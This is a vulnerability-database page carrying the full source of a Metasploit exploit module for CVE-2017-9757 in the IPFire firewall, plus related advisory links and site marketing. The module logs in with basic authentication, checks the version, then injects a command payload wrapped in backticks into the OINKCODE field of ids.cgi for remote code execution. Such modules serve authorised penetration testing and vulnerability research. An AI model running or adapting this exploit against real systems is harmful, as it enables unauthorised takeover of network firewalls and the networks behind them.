Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IPFire proxy.cgi RCE

🗓️ 14 Jun 2017 12:04:17Reported by h00die <[email protected]>, 0x09ALType 
metasploit
 metasploit🔗 www.rapid7.com👁 55 Views

IPFire firewall distribution version < 2.19 Update Core 110 remote command execution in ids.cgi pag

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2017-9757
19 Jun 201700:00
attackerkb
Circl		CVE-2017-9757
29 May 201815:50
circl
CNVD		IPFire Remote Code Execution Vulnerability
14 Jun 201700:00
cnvd
Check Point Advisories		IPFire ids.cgi OINKCODE Parameter Command Injection (CVE-2017-9757)
23 Jul 201700:00
checkpoint_advisories
CVE		CVE-2017-9757
19 Jun 201713:00
cve
Cvelist		CVE-2017-9757
19 Jun 201713:00
cvelist
NVD		CVE-2017-9757
19 Jun 201713:29
nvd
OpenVAS		IPFire 'OINKCODE' Parameter Remote Command Injection Vulnerability
6 Sep 201700:00
openvas
Prion		Command injection
19 Jun 201713:29
prion
##
## This module requires Metasploit: https://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => 'IPFire proxy.cgi RCE',
        'Description' => %q(
          IPFire, a free linux based open source firewall distribution,
          version < 2.19 Update Core 110 contains a remote command execution
          vulnerability in the ids.cgi page in the OINKCODE field.
        ),
        'Author'      =>
          [
            'h00die <[email protected]>', # module
            '0x09AL'                         # discovery
          ],
        'References'  =>
          [
            [ 'CVE', '2017-9757' ],
            [ 'EDB', '42149' ]
          ],
        'License'        => MSF_LICENSE,
        'Platform'       => 'unix',
        'Privileged'     => false,
        'DefaultOptions' => { 'SSL' => true },
        'Arch'           => [ ARCH_CMD ],
        'Payload'        =>
          {
            'Compat' =>
              {
                'PayloadType' => 'cmd',
                'RequiredCmd' => 'perl awk openssl'
              }
          },
        'Targets'        =>
          [
            [ 'Automatic Target', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2017-06-09'
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
        Opt::RPORT(444)
      ]
    )
  end

  def check
    begin
      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
      # after a chat with @bcoles in IRC.
      res = send_request_cgi(
        'uri'           => '/cgi-bin/pakfire.cgi',
        'method'        => 'GET',
        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      )

      if res && res.code == 200
        /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
      end
      if version.nil? || update.nil? || !Rex::Version.correct?(version)
        vprint_error('No Recognizable Version Found')
        CheckCode::Safe
      elsif Rex::Version.new(version) <= Rex::Version.new('2.19') && update.to_i <= 110
        CheckCode::Appears
      else
        vprint_error('Version and/or Update Not Supported')
        CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      print_error("Connection Failed")
      CheckCode::Safe
    end
  end

  def exploit
    begin
      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
      # after a chat with @bcoles in IRC.
      vprint_status('Sending request')
      res = send_request_cgi(
        'uri'           => '/cgi-bin/ids.cgi',
        'method'        => 'POST',
        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
        'headers'       =>
          {
            'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
          },
        'vars_post'          => {
          'ENABLE_SNORT_GREEN' => 'on',
          'ENABLE_SNORT' => 'on',
          'RULES' => 'registered',
          'OINKCODE' => "`#{payload.encoded}`",
          'ACTION' => 'Download new ruleset',
          'ACTION2' => 'snort'
          }
      )

      # success means we hang our session, and wont get back a response, so just check we get a response back
      if res && res.code != 200
        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2021 16:47Current
7.2High risk
Vulners AI Score7.2
CVSS 26.5
CVSS 38.8
EPSS0.77889
ipfirefirewalldistributionversion2.19core update 110remote command executionids.cgioinkcodevulnerabilityrcemetasploithttpclientcve-2017-9757edb-42149unixperlawkopensslauthorizationcgisnortsession
55